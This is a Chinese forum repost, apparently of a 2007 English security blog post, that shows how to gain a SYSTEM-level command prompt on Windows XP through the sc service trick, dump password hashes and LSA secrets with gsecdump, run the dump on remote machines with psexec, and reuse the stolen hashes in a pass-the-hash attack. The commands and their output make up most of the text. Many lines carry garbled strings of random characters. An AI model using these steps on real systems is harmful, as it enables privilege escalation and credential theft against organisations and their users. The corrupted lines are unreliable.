HASH注入式攻击

admin

o get a DOS Prompt as NT system:
# c6 b% Z) ^3 U$ Q
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
% Q' U+ i$ o2 a: f[SC] CreateService SUCCESS

; O! n0 `$ A* OC:\>sc start shellcmdline
- B9 P$ X$ Q- B' M8 T1 h0 ~[SC] StartService FAILED 1053:
2 P( }! i% x6 G. I6 a
The service did not respond to the start or control request in a timely fashion.
: z" R2 O+ A' M  n& @2 R. k6 v" V
C:\>sc delete shellcmdline
! t: V) h  Q% D2 K8 d! p( g- v[SC] DeleteService SUCCESS

3 ~) y3 n2 C% i# Z/ K' H- `* @/ o------------
( I9 C& g# v1 k+ k. ?! i6 Z: f6 @
) f2 P/ N) H5 Y5 z1 G! CThen in the new DOS window:
1 |! P% X' A9 A  v
Microsoft Windows XP [Version 5.1.2600]
- H, A: d2 ]2 z(C) Copyright 1985-2001 Microsoft Corp.
# c6 F4 I% S: P# Z* ]1 L; f
7 h: t$ X5 F& H, S) D. o& RC:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

% T4 ^3 U1 C5 N$ G/ CC:\WINDOWS\system32>gsecdump -h
7 l- S+ p) U7 c' [+ hgsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
! ?1 }: O( G3 H& M- R. P, ], U$ ausage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
9 ~* {4 R% p; }-l [ --dump_lsa ] dump lsa secrets
1 ^; O- N* d& E* @" e8 m+ \' L-w [ --dump_wireless ] dump microsoft wireless connections
( C8 b  L; q- A-u [ --dump_usedhashes ] dump hashes from active logon sessions
& {' G7 P7 J. L: H! N! b* y5 B, Q-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:
3 t; l; i3 q6 K3 ]1 ?% d
6 ~5 t- g* A0 l( n  H# F) z8 y! MPsExec v1.83 - Execute processes remotely
% J# X8 e, \! r; a/ g( sCopyright (C) 2001-2007 Mark Russinovich
Sysinternals - 链接标记[url]www.sysinternals.com[/url]
/ ?  ~* D! B5 }6 ?- A+ |5 w$ V& Z( p
  a+ F  C2 M! GC:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

' ?5 f  K: }8 R% ^7 H; x提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
3 g' M: y+ r' q; @
我看了下原文出处，貌似是/2007/03/16/郁闷啊，差距。
  K$ G$ X( m! G) c- \! E) Z, J